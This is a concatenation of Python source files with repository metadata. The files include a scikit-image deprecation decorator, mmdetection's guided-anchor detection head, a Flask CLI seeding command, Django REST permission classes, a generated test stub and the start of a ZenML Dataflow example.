        if modname in (None, "", "__builtin__", "builtins"):
            return o.__name__
        return o.__module__ + "." + o.__name__
    # No __name__: walk the MRO (o's own if it has one, else its class's)
    # and take the first base that produces a name.
    rv = None
    for base in getattr(o, "__mro__", o.__class__.__mro__):
        rv = name(base)
        if rv is not None:
            break
    return rv
| 34.827751 | 82 | 0.6233 |
acdf9c16bd58d68a21c2aad2dc5c74c7382aa49e | 1,596 | py | Python | skimage/_shared/utils.py | RKDSOne/scikit-image | baa67eafcace9cde1b94ad2d467e2f2e0468e759 | [
"BSD-3-Clause"
] | 1 | 2020-12-27T18:42:22.000Z | 2020-12-27T18:42:22.000Z | skimage/_shared/utils.py | RKDSOne/scikit-image | baa67eafcace9cde1b94ad2d467e2f2e0468e759 | [
"BSD-3-Clause"
] | null | null | null | skimage/_shared/utils.py | RKDSOne/scikit-image | baa67eafcace9cde1b94ad2d467e2f2e0468e759 | [
"BSD-3-Clause"
] | 2 | 2015-12-29T17:04:26.000Z | 2020-10-17T15:47:30.000Z | import warnings
import functools
__all__ = ['deprecated']
class deprecated(object):
    """Decorator to mark deprecated functions with warning.
    Adapted from <http://wiki.python.org/moin/PythonDecoratorLibrary>.

    Parameters
    ----------
    alt_func : str
        If given, tell user what function to use instead.
    behavior : {'warn', 'raise'}
        Behavior during call to deprecated function: 'warn' = warn user that
        function is deprecated; 'raise' = raise error.
    """

    def __init__(self, alt_func=None, behavior='warn'):
        self.alt_func = alt_func
        self.behavior = behavior

    def __call__(self, func):
        alt_msg = ''
        if self.alt_func is not None:
            alt_msg = ' Use `%s` instead.' % self.alt_func
        msg = 'Call to deprecated function `%s`.' % func.__name__
        msg += alt_msg

        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            if self.behavior == 'warn':
                # Fixed: `func.func_code` is Python 2-only and raises
                # AttributeError on Python 3; `func.__code__` works on
                # both (Python >= 2.6).
                warnings.warn_explicit(
                    msg,
                    category=DeprecationWarning,
                    filename=func.__code__.co_filename,
                    lineno=func.__code__.co_firstlineno + 1)
            elif self.behavior == 'raise':
                raise DeprecationWarning(msg)
            return func(*args, **kwargs)

        # modify doc string to display deprecation warning
        doc = '**Deprecated function**.' + alt_msg
        if wrapped.__doc__ is None:
            wrapped.__doc__ = doc
        else:
            wrapped.__doc__ = doc + '\n\n' + wrapped.__doc__

        return wrapped
| 29.555556 | 76 | 0.587719 |
acdf9d94dbfb3939feefc56870f4c73e9f575207 | 25,307 | py | Python | mmdet/models/anchor_heads/guided_anchor_head.py | thangvubk/Cascade-RPN | c832973b8d849acbe4c0ebf75f353c7f48ec457b | [
"Apache-2.0"
] | 184 | 2019-09-14T13:58:10.000Z | 2022-03-28T14:25:47.000Z | mmdet/models/anchor_heads/guided_anchor_head.py | XiaoShuhong/Cascade-RPN | c832973b8d849acbe4c0ebf75f353c7f48ec457b | [
"Apache-2.0"
] | 21 | 2019-09-23T12:25:26.000Z | 2021-03-13T18:22:15.000Z | mmdet/models/anchor_heads/guided_anchor_head.py | XiaoShuhong/Cascade-RPN | c832973b8d849acbe4c0ebf75f353c7f48ec457b | [
"Apache-2.0"
] | 18 | 2019-10-08T00:52:00.000Z | 2021-01-04T12:49:37.000Z | from __future__ import division
import numpy as np
import torch
import torch.nn as nn
from mmcv.cnn import normal_init
from mmdet.core import (AnchorGenerator, anchor_inside_flags, anchor_target,
delta2bbox, force_fp32, ga_loc_target, ga_shape_target,
multi_apply, multiclass_nms)
from mmdet.ops import DeformConv, MaskedConv2d
from ..builder import build_loss
from ..registry import HEADS
from ..utils import bias_init_with_prob
from .anchor_head import AnchorHead
class FeatureAdaption(nn.Module):
    """Feature Adaption Module.
    Feature Adaption Module is implemented based on DCN v1.
    It uses anchor shape prediction rather than feature map to
    predict offsets of deformable conv layer.
    Args:
        in_channels (int): Number of channels in the input feature map.
        out_channels (int): Number of channels in the output feature map.
        kernel_size (int): Deformable conv kernel size.
        deformable_groups (int): Deformable conv group size.
    """
    def __init__(self,
                 in_channels,
                 out_channels,
                 kernel_size=3,
                 deformable_groups=4):
        super(FeatureAdaption, self).__init__()
        # Each kernel position needs an (x, y) offset pair.
        offset_channels = kernel_size * kernel_size * 2
        # 1x1 conv mapping the 2-channel shape prediction to deformable-conv
        # offsets (one offset field per deformable group).
        self.conv_offset = nn.Conv2d(
            2, deformable_groups * offset_channels, 1, bias=False)
        self.conv_adaption = DeformConv(
            in_channels,
            out_channels,
            kernel_size=kernel_size,
            padding=(kernel_size - 1) // 2,
            deformable_groups=deformable_groups)
        self.relu = nn.ReLU(inplace=True)
    def init_weights(self):
        # Gaussian init; the offset branch uses a larger std than the conv.
        normal_init(self.conv_offset, std=0.1)
        normal_init(self.conv_adaption, std=0.01)
    def forward(self, x, shape):
        # `shape` is detached so gradients from the offset computation do
        # not flow back into the shape-prediction branch.
        offset = self.conv_offset(shape.detach())
        x = self.relu(self.conv_adaption(x, offset))
        return x
@HEADS.register_module
class GuidedAnchorHead(AnchorHead):
"""Guided-Anchor-based head (GA-RPN, GA-RetinaNet, etc.).
This GuidedAnchorHead will predict high-quality feature guided
anchors and locations where anchors will be kept in inference.
There are mainly 3 categories of bounding-boxes.
- Sampled (9) pairs for target assignment. (approxes)
- The square boxes where the predicted anchors are based on.
(squares)
- Guided anchors.
Please refer to https://arxiv.org/abs/1901.03278 for more details.
Args:
num_classes (int): Number of classes.
in_channels (int): Number of channels in the input feature map.
feat_channels (int): Number of channels of the feature map.
octave_base_scale (int): Base octave scale of each level of
feature map.
scales_per_octave (int): Number of octave scales in each level of
feature map
octave_ratios (Iterable): octave aspect ratios.
anchor_strides (Iterable): Anchor strides.
anchor_base_sizes (Iterable): Anchor base sizes.
anchoring_means (Iterable): Mean values of anchoring targets.
anchoring_stds (Iterable): Std values of anchoring targets.
target_means (Iterable): Mean values of regression targets.
target_stds (Iterable): Std values of regression targets.
deformable_groups: (int): Group number of DCN in
FeatureAdaption module.
loc_filter_thr (float): Threshold to filter out unconcerned regions.
loss_loc (dict): Config of location loss.
loss_shape (dict): Config of anchor shape loss.
loss_cls (dict): Config of classification loss.
loss_bbox (dict): Config of bbox regression loss.
"""
def __init__(
self,
num_classes,
in_channels,
feat_channels=256,
octave_base_scale=8,
scales_per_octave=3,
octave_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
anchor_base_sizes=None,
anchoring_means=(.0, .0, .0, .0),
anchoring_stds=(1.0, 1.0, 1.0, 1.0),
target_means=(.0, .0, .0, .0),
target_stds=(1.0, 1.0, 1.0, 1.0),
deformable_groups=4,
loc_filter_thr=0.01,
loss_loc=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_shape=dict(type='BoundedIoULoss', beta=0.2, loss_weight=1.0),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0,
loss_weight=1.0)): # yapf: disable
super(AnchorHead, self).__init__()
self.in_channels = in_channels
self.num_classes = num_classes
self.feat_channels = feat_channels
self.octave_base_scale = octave_base_scale
self.scales_per_octave = scales_per_octave
self.octave_scales = octave_base_scale * np.array(
[2**(i / scales_per_octave) for i in range(scales_per_octave)])
self.approxs_per_octave = len(self.octave_scales) * len(octave_ratios)
self.octave_ratios = octave_ratios
self.anchor_strides = anchor_strides
self.anchor_base_sizes = list(
anchor_strides) if anchor_base_sizes is None else anchor_base_sizes
self.anchoring_means = anchoring_means
self.anchoring_stds = anchoring_stds
self.target_means = target_means
self.target_stds = target_stds
self.deformable_groups = deformable_groups
self.loc_filter_thr = loc_filter_thr
self.approx_generators = []
self.square_generators = []
for anchor_base in self.anchor_base_sizes:
# Generators for approxs
self.approx_generators.append(
AnchorGenerator(anchor_base, self.octave_scales,
self.octave_ratios))
# Generators for squares
self.square_generators.append(
AnchorGenerator(anchor_base, [self.octave_base_scale], [1.0]))
# one anchor per location
self.num_anchors = 1
self.use_sigmoid_cls = loss_cls.get('use_sigmoid', False)
self.cls_focal_loss = loss_cls['type'] in ['FocalLoss']
self.loc_focal_loss = loss_loc['type'] in ['FocalLoss']
if self.use_sigmoid_cls:
self.cls_out_channels = self.num_classes - 1
else:
self.cls_out_channels = self.num_classes
# build losses
self.loss_loc = build_loss(loss_loc)
self.loss_shape = build_loss(loss_shape)
self.loss_cls = build_loss(loss_cls)
self.loss_bbox = build_loss(loss_bbox)
self.fp16_enabled = False
self._init_layers()
    def _init_layers(self):
        """Build location, shape, feature-adaption and prediction layers."""
        self.relu = nn.ReLU(inplace=True)
        # 1-channel objectness ("location") map per spatial position.
        self.conv_loc = nn.Conv2d(self.feat_channels, 1, 1)
        # 2 channels (w, h deltas) per anchor for shape prediction.
        self.conv_shape = nn.Conv2d(self.feat_channels, self.num_anchors * 2,
                                    1)
        self.feature_adaption = FeatureAdaption(
            self.feat_channels,
            self.feat_channels,
            kernel_size=3,
            deformable_groups=self.deformable_groups)
        # Masked convs let inference skip filtered-out locations.
        self.conv_cls = MaskedConv2d(self.feat_channels,
                                     self.num_anchors * self.cls_out_channels,
                                     1)
        self.conv_reg = MaskedConv2d(self.feat_channels, self.num_anchors * 4,
                                     1)
    def init_weights(self):
        """Initialize head convolutions; loc conv gets a focal-loss bias."""
        normal_init(self.conv_cls, std=0.01)
        normal_init(self.conv_reg, std=0.01)
        # Bias so initial objectness probability is ~0.01 (focal-loss init).
        bias_cls = bias_init_with_prob(0.01)
        normal_init(self.conv_loc, std=0.01, bias=bias_cls)
        normal_init(self.conv_shape, std=0.01)
        self.feature_adaption.init_weights()
    def forward_single(self, x):
        """Forward one pyramid level.

        Returns:
            tuple: (cls_score, bbox_pred, shape_pred, loc_pred).
        """
        loc_pred = self.conv_loc(x)
        shape_pred = self.conv_shape(x)
        x = self.feature_adaption(x, shape_pred)
        # masked conv is only used during inference for speed-up
        if not self.training:
            mask = loc_pred.sigmoid()[0] >= self.loc_filter_thr
        else:
            mask = None
        cls_score = self.conv_cls(x, mask)
        bbox_pred = self.conv_reg(x, mask)
        return cls_score, bbox_pred, shape_pred, loc_pred
    def forward(self, feats):
        """Apply :meth:`forward_single` to each feature-pyramid level."""
        return multi_apply(self.forward_single, feats)
    def get_sampled_approxs(self,
                            featmap_sizes,
                            img_metas,
                            cfg,
                            device='cuda'):
        """Get sampled approxs and inside flags according to feature map sizes.
        Args:
            featmap_sizes (list[tuple]): Multi-level feature map sizes.
            img_metas (list[dict]): Image meta info.
            cfg: config providing ``allowed_border`` for the inside test.
            device (torch.device | str): device for returned tensors
        Returns:
            tuple: approxes of each image, inside flags of each image
        """
        num_imgs = len(img_metas)
        num_levels = len(featmap_sizes)
        # since feature map sizes of all images are the same, we only compute
        # approxes for one time
        multi_level_approxs = []
        for i in range(num_levels):
            approxs = self.approx_generators[i].grid_anchors(
                featmap_sizes[i], self.anchor_strides[i], device=device)
            multi_level_approxs.append(approxs)
        # NOTE: every image shares the *same* per-level list object here;
        # safe only while callers treat it as read-only.
        approxs_list = [multi_level_approxs for _ in range(num_imgs)]
        # for each image, we compute inside flags of multi level approxes
        inside_flag_list = []
        for img_id, img_meta in enumerate(img_metas):
            multi_level_flags = []
            multi_level_approxs = approxs_list[img_id]
            for i in range(num_levels):
                approxs = multi_level_approxs[i]
                anchor_stride = self.anchor_strides[i]
                feat_h, feat_w = featmap_sizes[i]
                h, w, _ = img_meta['pad_shape']
                valid_feat_h = min(int(np.ceil(h / anchor_stride)), feat_h)
                valid_feat_w = min(int(np.ceil(w / anchor_stride)), feat_w)
                flags = self.approx_generators[i].valid_flags(
                    (feat_h, feat_w), (valid_feat_h, valid_feat_w),
                    device=device)
                inside_flags_list = []
                # NOTE(review): this inner loop reuses the name ``i`` and
                # shadows the level index; benign in Python (the outer
                # ``for i in range(...)`` rebinds each iteration) but worth
                # renaming if this code is ever touched.
                for i in range(self.approxs_per_octave):
                    split_valid_flags = flags[i::self.approxs_per_octave]
                    split_approxs = approxs[i::self.approxs_per_octave, :]
                    inside_flags = anchor_inside_flags(
                        split_approxs, split_valid_flags,
                        img_meta['img_shape'][:2], cfg.allowed_border)
                    inside_flags_list.append(inside_flags)
                # inside_flag for a position is true if any anchor in this
                # position is true
                inside_flags = (
                    torch.stack(inside_flags_list, 0).sum(dim=0) > 0)
                multi_level_flags.append(inside_flags)
            inside_flag_list.append(multi_level_flags)
        return approxs_list, inside_flag_list
    def get_anchors(self,
                    featmap_sizes,
                    shape_preds,
                    loc_preds,
                    img_metas,
                    use_loc_filter=False,
                    device='cuda'):
        """Get squares according to feature map sizes and guided
        anchors.
        Args:
            featmap_sizes (list[tuple]): Multi-level feature map sizes.
            shape_preds (list[tensor]): Multi-level shape predictions.
            loc_preds (list[tensor]): Multi-level location predictions.
            img_metas (list[dict]): Image meta info.
            use_loc_filter (bool): Use loc filter or not.
            device (torch.device | str): device for returned tensors
        Returns:
            tuple: square approxs of each image, guided anchors of each image,
                loc masks of each image
        """
        num_imgs = len(img_metas)
        num_levels = len(featmap_sizes)
        # since feature map sizes of all images are the same, we only compute
        # squares for one time
        multi_level_squares = []
        for i in range(num_levels):
            squares = self.square_generators[i].grid_anchors(
                featmap_sizes[i], self.anchor_strides[i], device=device)
            multi_level_squares.append(squares)
        # Same per-level list object shared across images (read-only use).
        squares_list = [multi_level_squares for _ in range(num_imgs)]
        # for each image, we compute multi level guided anchors
        guided_anchors_list = []
        loc_mask_list = []
        for img_id, img_meta in enumerate(img_metas):
            multi_level_guided_anchors = []
            multi_level_loc_mask = []
            for i in range(num_levels):
                squares = squares_list[img_id][i]
                # Per-image slice of the level's predictions.
                shape_pred = shape_preds[i][img_id]
                loc_pred = loc_preds[i][img_id]
                guided_anchors, loc_mask = self.get_guided_anchors_single(
                    squares,
                    shape_pred,
                    loc_pred,
                    use_loc_filter=use_loc_filter)
                multi_level_guided_anchors.append(guided_anchors)
                multi_level_loc_mask.append(loc_mask)
            guided_anchors_list.append(multi_level_guided_anchors)
            loc_mask_list.append(multi_level_loc_mask)
        return squares_list, guided_anchors_list, loc_mask_list
    def get_guided_anchors_single(self,
                                  squares,
                                  shape_pred,
                                  loc_pred,
                                  use_loc_filter=False):
        """Get guided anchors and loc masks for a single level.
        Args:
            squares (tensor): Squares of a single level.
            shape_pred (tensor): Shape predictions of a single level.
            loc_pred (tensor): Loc predictions of a single level.
            use_loc_filter (bool): Use loc filter or not.
        Returns:
            tuple: guided anchors, location masks
        """
        # calculate location filtering mask
        loc_pred = loc_pred.sigmoid().detach()
        if use_loc_filter:
            loc_mask = loc_pred >= self.loc_filter_thr
        else:
            # Threshold 0.0 keeps every location (training path).
            loc_mask = loc_pred >= 0.0
        mask = loc_mask.permute(1, 2, 0).expand(-1, -1, self.num_anchors)
        mask = mask.contiguous().view(-1)
        # calculate guided anchors
        squares = squares[mask]
        anchor_deltas = shape_pred.permute(1, 2, 0).contiguous().view(
            -1, 2).detach()[mask]
        # Only w/h deltas are predicted; x/y deltas stay zero (anchor centers
        # are fixed at the square centers).
        bbox_deltas = anchor_deltas.new_full(squares.size(), 0)
        bbox_deltas[:, 2:] = anchor_deltas
        guided_anchors = delta2bbox(
            squares,
            bbox_deltas,
            self.anchoring_means,
            self.anchoring_stds,
            wh_ratio_clip=1e-6)
        return guided_anchors, mask
    def loss_shape_single(self, shape_pred, bbox_anchors, bbox_gts,
                          anchor_weights, anchor_total_num):
        """Compute the anchor-shape loss for one feature level."""
        shape_pred = shape_pred.permute(0, 2, 3, 1).contiguous().view(-1, 2)
        bbox_anchors = bbox_anchors.contiguous().view(-1, 4)
        bbox_gts = bbox_gts.contiguous().view(-1, 4)
        anchor_weights = anchor_weights.contiguous().view(-1, 4)
        # Deltas: zero x/y shift, predicted w/h only (same convention as
        # get_guided_anchors_single).
        bbox_deltas = bbox_anchors.new_full(bbox_anchors.size(), 0)
        bbox_deltas[:, 2:] += shape_pred
        # filter out negative samples to speed-up weighted_bounded_iou_loss
        inds = torch.nonzero(anchor_weights[:, 0] > 0).squeeze(1)
        bbox_deltas_ = bbox_deltas[inds]
        bbox_anchors_ = bbox_anchors[inds]
        bbox_gts_ = bbox_gts[inds]
        anchor_weights_ = anchor_weights[inds]
        pred_anchors_ = delta2bbox(
            bbox_anchors_,
            bbox_deltas_,
            self.anchoring_means,
            self.anchoring_stds,
            wh_ratio_clip=1e-6)
        loss_shape = self.loss_shape(
            pred_anchors_,
            bbox_gts_,
            anchor_weights_,
            avg_factor=anchor_total_num)
        return loss_shape
    def loss_loc_single(self, loc_pred, loc_target, loc_weight, loc_avg_factor,
                        cfg):
        """Compute the anchor-location (objectness) loss for one level.

        ``cfg`` is accepted for call-site symmetry but is not used here.
        """
        loss_loc = self.loss_loc(
            loc_pred.reshape(-1, 1),
            loc_target.reshape(-1, 1).long(),
            loc_weight.reshape(-1, 1),
            avg_factor=loc_avg_factor)
        return loss_loc
    @force_fp32(
        apply_to=('cls_scores', 'bbox_preds', 'shape_preds', 'loc_preds'))
    def loss(self,
             cls_scores,
             bbox_preds,
             shape_preds,
             loc_preds,
             gt_bboxes,
             gt_labels,
             img_metas,
             cfg,
             gt_bboxes_ignore=None):
        """Compute all GA losses (cls, bbox, shape, loc).

        Returns ``None`` when target assignment fails, otherwise a dict with
        keys ``loss_cls``, ``loss_bbox``, ``loss_shape`` and ``loss_loc``.
        """
        featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
        assert len(featmap_sizes) == len(self.approx_generators)
        device = cls_scores[0].device
        # get loc targets
        loc_targets, loc_weights, loc_avg_factor = ga_loc_target(
            gt_bboxes,
            featmap_sizes,
            self.octave_base_scale,
            self.anchor_strides,
            center_ratio=cfg.center_ratio,
            ignore_ratio=cfg.ignore_ratio)
        # get sampled approxes
        approxs_list, inside_flag_list = self.get_sampled_approxs(
            featmap_sizes, img_metas, cfg, device=device)
        # get squares and guided anchors
        squares_list, guided_anchors_list, _ = self.get_anchors(
            featmap_sizes, shape_preds, loc_preds, img_metas, device=device)
        # get shape targets
        sampling = False if not hasattr(cfg, 'ga_sampler') else True
        shape_targets = ga_shape_target(
            approxs_list,
            inside_flag_list,
            squares_list,
            gt_bboxes,
            img_metas,
            self.approxs_per_octave,
            cfg,
            sampling=sampling)
        if shape_targets is None:
            return None
        (bbox_anchors_list, bbox_gts_list, anchor_weights_list, anchor_fg_num,
         anchor_bg_num) = shape_targets
        anchor_total_num = (
            anchor_fg_num if not sampling else anchor_fg_num + anchor_bg_num)
        # get anchor targets
        # NOTE: ``sampling`` is re-derived here for the classification stage;
        # the earlier value only applied to the shape-target stage.
        sampling = False if self.cls_focal_loss else True
        label_channels = self.cls_out_channels if self.use_sigmoid_cls else 1
        cls_reg_targets = anchor_target(
            guided_anchors_list,
            inside_flag_list,
            gt_bboxes,
            img_metas,
            self.target_means,
            self.target_stds,
            cfg,
            gt_bboxes_ignore_list=gt_bboxes_ignore,
            gt_labels_list=gt_labels,
            label_channels=label_channels,
            sampling=sampling)
        if cls_reg_targets is None:
            return None
        (labels_list, label_weights_list, bbox_targets_list, bbox_weights_list,
         _, num_total_pos, num_total_neg) = cls_reg_targets
        num_total_samples = (
            num_total_pos if self.cls_focal_loss else num_total_pos +
            num_total_neg)
        # get classification and bbox regression losses
        losses_cls, losses_bbox = multi_apply(
            self.loss_single,
            cls_scores,
            bbox_preds,
            labels_list,
            label_weights_list,
            bbox_targets_list,
            bbox_weights_list,
            num_total_samples=num_total_samples,
            cfg=cfg)
        # get anchor location loss
        losses_loc = []
        for i in range(len(loc_preds)):
            loss_loc = self.loss_loc_single(
                loc_preds[i],
                loc_targets[i],
                loc_weights[i],
                loc_avg_factor=loc_avg_factor,
                cfg=cfg)
            losses_loc.append(loss_loc)
        # get anchor shape loss
        losses_shape = []
        for i in range(len(shape_preds)):
            loss_shape = self.loss_shape_single(
                shape_preds[i],
                bbox_anchors_list[i],
                bbox_gts_list[i],
                anchor_weights_list[i],
                anchor_total_num=anchor_total_num)
            losses_shape.append(loss_shape)
        return dict(
            loss_cls=losses_cls,
            loss_bbox=losses_bbox,
            loss_shape=losses_shape,
            loss_loc=losses_loc)
    @force_fp32(
        apply_to=('cls_scores', 'bbox_preds', 'shape_preds', 'loc_preds'))
    def get_bboxes(self,
                   cls_scores,
                   bbox_preds,
                   shape_preds,
                   loc_preds,
                   img_metas,
                   cfg,
                   rescale=False):
        """Decode per-image detections from multi-level head outputs."""
        assert len(cls_scores) == len(bbox_preds) == len(shape_preds) == len(
            loc_preds)
        num_levels = len(cls_scores)
        featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
        device = cls_scores[0].device
        # get guided anchors; location filtering is only enabled at inference.
        _, guided_anchors, loc_masks = self.get_anchors(
            featmap_sizes,
            shape_preds,
            loc_preds,
            img_metas,
            use_loc_filter=not self.training,
            device=device)
        result_list = []
        for img_id in range(len(img_metas)):
            # Per-image, per-level slices, detached from the graph.
            cls_score_list = [
                cls_scores[i][img_id].detach() for i in range(num_levels)
            ]
            bbox_pred_list = [
                bbox_preds[i][img_id].detach() for i in range(num_levels)
            ]
            guided_anchor_list = [
                guided_anchors[img_id][i].detach() for i in range(num_levels)
            ]
            loc_mask_list = [
                loc_masks[img_id][i].detach() for i in range(num_levels)
            ]
            img_shape = img_metas[img_id]['img_shape']
            scale_factor = img_metas[img_id]['scale_factor']
            proposals = self.get_bboxes_single(cls_score_list, bbox_pred_list,
                                               guided_anchor_list,
                                               loc_mask_list, img_shape,
                                               scale_factor, cfg, rescale)
            result_list.append(proposals)
        return result_list
    def get_bboxes_single(self,
                          cls_scores,
                          bbox_preds,
                          mlvl_anchors,
                          mlvl_masks,
                          img_shape,
                          scale_factor,
                          cfg,
                          rescale=False):
        """Decode detections for a single image across pyramid levels.

        NOTE(review): if *every* level is filtered out by its mask, the
        ``torch.cat(mlvl_bboxes)`` below is called on an empty list and
        raises — confirm callers guarantee at least one surviving level.
        """
        assert len(cls_scores) == len(bbox_preds) == len(mlvl_anchors)
        mlvl_bboxes = []
        mlvl_scores = []
        for cls_score, bbox_pred, anchors, mask in zip(cls_scores, bbox_preds,
                                                       mlvl_anchors,
                                                       mlvl_masks):
            assert cls_score.size()[-2:] == bbox_pred.size()[-2:]
            # if no location is kept, end.
            if mask.sum() == 0:
                continue
            # reshape scores and bbox_pred
            cls_score = cls_score.permute(1, 2,
                                          0).reshape(-1, self.cls_out_channels)
            if self.use_sigmoid_cls:
                scores = cls_score.sigmoid()
            else:
                scores = cls_score.softmax(-1)
            bbox_pred = bbox_pred.permute(1, 2, 0).reshape(-1, 4)
            # filter scores, bbox_pred w.r.t. mask.
            # anchors are filtered in get_anchors() beforehand.
            scores = scores[mask, :]
            bbox_pred = bbox_pred[mask, :]
            # NOTE(review): after 2-D boolean indexing ``scores`` keeps
            # dim >= 1, so this branch looks unreachable — verify.
            if scores.dim() == 0:
                anchors = anchors.unsqueeze(0)
                scores = scores.unsqueeze(0)
                bbox_pred = bbox_pred.unsqueeze(0)
            # filter anchors, bbox_pred, scores w.r.t. scores
            nms_pre = cfg.get('nms_pre', -1)
            if nms_pre > 0 and scores.shape[0] > nms_pre:
                if self.use_sigmoid_cls:
                    max_scores, _ = scores.max(dim=1)
                else:
                    # skip the background class (column 0) for ranking
                    max_scores, _ = scores[:, 1:].max(dim=1)
                _, topk_inds = max_scores.topk(nms_pre)
                anchors = anchors[topk_inds, :]
                bbox_pred = bbox_pred[topk_inds, :]
                scores = scores[topk_inds, :]
            bboxes = delta2bbox(anchors, bbox_pred, self.target_means,
                                self.target_stds, img_shape)
            mlvl_bboxes.append(bboxes)
            mlvl_scores.append(scores)
        mlvl_bboxes = torch.cat(mlvl_bboxes)
        if rescale:
            mlvl_bboxes /= mlvl_bboxes.new_tensor(scale_factor)
        mlvl_scores = torch.cat(mlvl_scores)
        if self.use_sigmoid_cls:
            # Prepend a zero background column expected by multiclass_nms.
            padding = mlvl_scores.new_zeros(mlvl_scores.shape[0], 1)
            mlvl_scores = torch.cat([padding, mlvl_scores], dim=1)
        # multi class NMS
        det_bboxes, det_labels = multiclass_nms(mlvl_bboxes, mlvl_scores,
                                                cfg.score_thr, cfg.nms,
                                                cfg.max_per_img)
        return det_bboxes, det_labels
| 40.621188 | 79 | 0.581144 |
acdf9daf59adf03f901bb82eb2af2d26dc443ffd | 707 | py | Python | listthedocs/commands.py | dvd7587/listthedocs | b4734be11977ea971e0ad5fa2e9920cc63e54ec0 | [
"MIT"
] | 3 | 2019-08-12T13:46:13.000Z | 2020-03-20T08:09:16.000Z | listthedocs/commands.py | dvd7587/listthedocs | b4734be11977ea971e0ad5fa2e9920cc63e54ec0 | [
"MIT"
] | 7 | 2019-08-12T13:06:32.000Z | 2020-03-28T14:33:16.000Z | listthedocs/commands.py | dvd7587/listthedocs | b4734be11977ea971e0ad5fa2e9920cc63e54ec0 | [
"MIT"
] | 2 | 2019-09-26T14:31:09.000Z | 2019-10-01T08:49:47.000Z | import click
from flask.cli import with_appcontext
from .database import database
from .entities import Version, Project
@click.command('add_listthedocs')
@with_appcontext
def add_listthedocs_project():
    """Seed the database with the 'list-the-docs' demo project and one version."""
    if database.get_project('list-the-docs') is not None:
        print('Project already exists')
        return

    # Create and persist the project record.
    new_project = Project(
        title='List The Docs',
        description="Documentation of List The Docs",
        code='list-the-docs',
    )
    new_project = database.add_project(new_project)
    print('Added project', new_project.title)

    # Attach the initial documentation version.
    database.add_version(
        new_project.code,
        Version('2.0.0', 'https://allebacco.github.io/listthedocs/'),
    )
    print('Added version 2.0.0')
acdf9e2ab3ff4ca175712f256961372f619e18d8 | 700 | py | Python | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | 1 | 2022-02-13T13:51:13.000Z | 2022-02-13T13:51:13.000Z | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | null | null | null | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | null | null | null | from rest_framework import permissions
class OnlyCanSeeAdminUser(permissions.BasePermission):
    """Restrict the ``list`` action to staff users.

    Every other action defers to the base-class behavior.
    """

    def has_permission(self, request, view):
        if view.action == "list":
            # ``is_staff`` is already a boolean; return it directly instead
            # of the original ``== True`` comparison with if/else branches.
            return bool(request.user.is_staff)
        return super().has_permission(request, view)
class OnlyCanAcceptAdminUser(permissions.BasePermission):
    """Restrict the ``create`` action to staff users.

    Every other action defers to the base-class behavior.
    """

    def has_permission(self, request, view):
        if view.action == "create":
            # ``is_staff`` is already a boolean; return it directly instead
            # of the original ``== True`` comparison with if/else branches.
            return bool(request.user.is_staff)
        return super().has_permission(request, view)
acdf9e79b4674a8b39be66553e3dd0aef2352508 | 929 | py | Python | test/test_variable_name_value.py | dcompane/controlm_py | c521208be2f00303383bb32ca5eb2b7ff91999d3 | [
"MIT"
] | 2 | 2020-03-20T18:24:23.000Z | 2021-03-05T22:05:04.000Z | test/test_variable_name_value.py | dcompane/controlm_py | c521208be2f00303383bb32ca5eb2b7ff91999d3 | [
"MIT"
] | null | null | null | test/test_variable_name_value.py | dcompane/controlm_py | c521208be2f00303383bb32ca5eb2b7ff91999d3 | [
"MIT"
] | 1 | 2021-05-27T15:54:37.000Z | 2021-05-27T15:54:37.000Z | # coding: utf-8
"""
Control-M Services
Provides access to BMC Control-M Services # noqa: E501
OpenAPI spec version: 9.20.220
Contact: customer_support@bmc.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import controlm_py
from controlm_py.models.variable_name_value import VariableNameValue # noqa: E501
from controlm_py.rest import ApiException
class TestVariableNameValue(unittest.TestCase):
    """VariableNameValue unit test stubs"""
    def setUp(self):
        # No fixtures needed yet; placeholder kept by the code generator.
        pass
    def tearDown(self):
        # Nothing to clean up.
        pass
    def testVariableNameValue(self):
        """Test VariableNameValue"""
        # FIXME: construct object with mandatory attributes with example values
        # model = controlm_py.models.variable_name_value.VariableNameValue() # noqa: E501
        pass
unittest.main()
| 23.225 | 90 | 0.714747 |
acdf9f6a77d077d38ed2b7ebaa5a88f57bd76811 | 3,005 | py | Python | examples/gcp_dataflow/run.py | Camicb/zenml | 92788a76c7923a30612c5f5bdaaf5bb9554773a1 | [
"Apache-2.0"
] | null | null | null | examples/gcp_dataflow/run.py | Camicb/zenml | 92788a76c7923a30612c5f5bdaaf5bb9554773a1 | [
"Apache-2.0"
] | null | null | null | examples/gcp_dataflow/run.py | Camicb/zenml | 92788a76c7923a30612c5f5bdaaf5bb9554773a1 | [
"Apache-2.0"
] | 1 | 2020-12-27T08:16:42.000Z | 2020-12-27T08:16:42.000Z | from zenml.core.backends.processing.processing_dataflow_backend import \
ProcessingDataFlowBackend
from zenml.core.datasources.csv_datasource import CSVDatasource
from zenml.core.metadata.mysql_metadata_wrapper import MySQLMetadataStore
from zenml.core.pipelines.training_pipeline import TrainingPipeline
from zenml.core.repo.artifact_store import ArtifactStore
from zenml.core.steps.evaluator.tfma_evaluator import TFMAEvaluator
from zenml.core.steps.preprocesser.standard_preprocesser \
.standard_preprocesser import \
StandardPreprocesser
from zenml.core.steps.split.random_split import RandomSplit
from zenml.core.steps.trainer.feedforward_trainer import FeedForwardTrainer
# NOTE(review): the values below are placeholders. Real credentials must come
# from environment variables or a secret manager — never commit passwords.
artifact_store_path = 'gs://your-bucket-name/optional-subfolder'
project = 'PROJECT'  # the project to launch the VM in
cloudsql_connection_name = f'{project}:REGION:INSTANCE'
mysql_db = 'DATABASE'
mysql_user = 'USERNAME'
mysql_pw = 'PASSWORD'
